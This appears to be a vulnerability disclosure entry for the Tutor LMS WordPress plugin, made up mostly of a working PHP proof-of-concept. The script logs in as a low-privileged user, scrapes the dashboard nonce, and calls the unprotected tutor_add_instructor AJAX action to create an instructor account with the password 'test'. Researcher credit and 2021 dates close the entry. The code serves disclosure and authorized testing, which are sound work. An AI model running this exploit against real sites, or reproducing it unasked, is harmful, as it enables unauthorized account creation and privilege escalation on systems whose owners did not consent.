Several AJAX endpoints in the plugin lacked authorization checks, allowing any authenticated low-privileged user (a student) to modify course information, elevate their own privileges, and perform many other privileged actions.
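Only one PoC provided for privilege escalation.
<?php
// PoC: privilege escalation via the unprotected `tutor_add_instructor` admin-ajax
// action. An existing low-privileged account (the listing calls it a "customer")
// is enough: wp-admin/index.php hands every logged-in user the Tutor `_wpnonce`,
// and the action itself performs no capability check, so the nonce alone lets the
// caller create a new instructor account.
//
// Usage: php poc.php <wp_url> <low_priv_user> <password> [new_instructor_email]
//
// WARNING: this creates a real WordPress user on the target (login `Instructor`,
// password `test`). Run it only against an instance you are authorised to test,
// change the password below if the instance is reachable from the internet, and
// remove the account afterwards.

/**
 * Perform one HTTP request through the shared cookie jar and return the body.
 *
 * Exits the script with status 1 on a transport-level failure (DNS, TLS, refused
 * connection); HTTP error statuses are returned as-is so the caller can inspect
 * them.
 *
 * @param string     $url       absolute URL to request
 * @param string     $cookiejar path of the curl cookie jar (read and written)
 * @param array|null $post      form fields for a POST, or null for a GET
 * @return string response body
 */
function poc_request(string $url, string $cookiejar, ?array $post = null): string
{
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_COOKIEJAR      => $cookiejar,
        CURLOPT_COOKIEFILE     => $cookiejar,
        CURLOPT_RETURNTRANSFER => true,
        // wp-login.php answers with a 302 to wp-admin; curl re-issues it as a GET.
        CURLOPT_FOLLOWLOCATION => true,
    ]);
    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        // An array here is sent as multipart/form-data, exactly as in the original PoC.
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        fwrite(STDERR, "request to {$url} failed: {$err}\n");
        exit(1);
    }
    curl_close($ch);
    return $body;
}

// Settings
if ($argc < 4) {
    fwrite(STDERR, "usage: php {$argv[0]} <wp_url> <low_priv_user> <password> [new_instructor_email]\n");
    exit(1);
}
$wp_url  = rtrim($argv[1], '/');
$wp_user = $argv[2];
$wp_pass = $argv[3];
// The published listing shows the instructor e-mail as "[email protected]", which
// looks like an obfuscation artefact of the publishing page rather than a usable
// address, so the address is taken from argv (or a documentation-reserved default).
$new_email = $argv[4] ?? 'instructor@example.com';

$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
if ($cookiejar === false) {
    fwrite(STDERR, "cannot create a temporary cookie jar\n");
    exit(1);
}

// 1) Log in as the low-privileged user; WordPress writes the auth cookies into the jar.
poc_request($wp_url . '/wp-login.php', $cookiejar, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);

// 2) Pull the nonce. Tutor embeds `var tutor_data = {...,"_wpnonce":"..."}` in the
//    dashboard for every logged-in user. The original PoC matched the full
//    localisable "delete_confirm_text" string; anchoring on the object and the
//    `_wpnonce` key instead keeps the PoC working on translated sites.
$content = poc_request($wp_url . '/wp-admin/index.php', $cookiejar);
if (!preg_match('/var\s+tutor_data\s*=\s*\{.*?"_wpnonce"\s*:\s*"([^"]+)"/s', $content, $matches)) {
    unlink($cookiejar);
    fwrite(STDERR, "could not find the tutor_data nonce - login failed or Tutor LMS is not active?\n");
    exit(1);
}
$nonce = $matches[1];
echo "nonce: {$nonce}\n";

// 3) Create an instructor account. Only the nonce is verified server-side; there is
//    no capability check, so the low-privileged session is accepted.
$output = poc_request($wp_url . '/wp-admin/admin-ajax.php', $cookiejar, [
    'first_name'            => 'Instructor',
    'last_name'             => 'Instructor',
    'user_login'            => 'Instructor',
    'email'                 => $new_email,
    'phone_number'          => '1234567890',
    'password'              => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio'     => '',
    'action'                => 'tutor_add_instructor',
    '_wpnonce'              => $nonce,
]);
unlink($cookiejar);
print_r($output);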
Chloe Chamberland
Chloe Chamberland
Yes
2021-03-15 (about 2 years ago)
2021-03-15 (about 2 years ago)
2021-03-20 (about 2 years ago)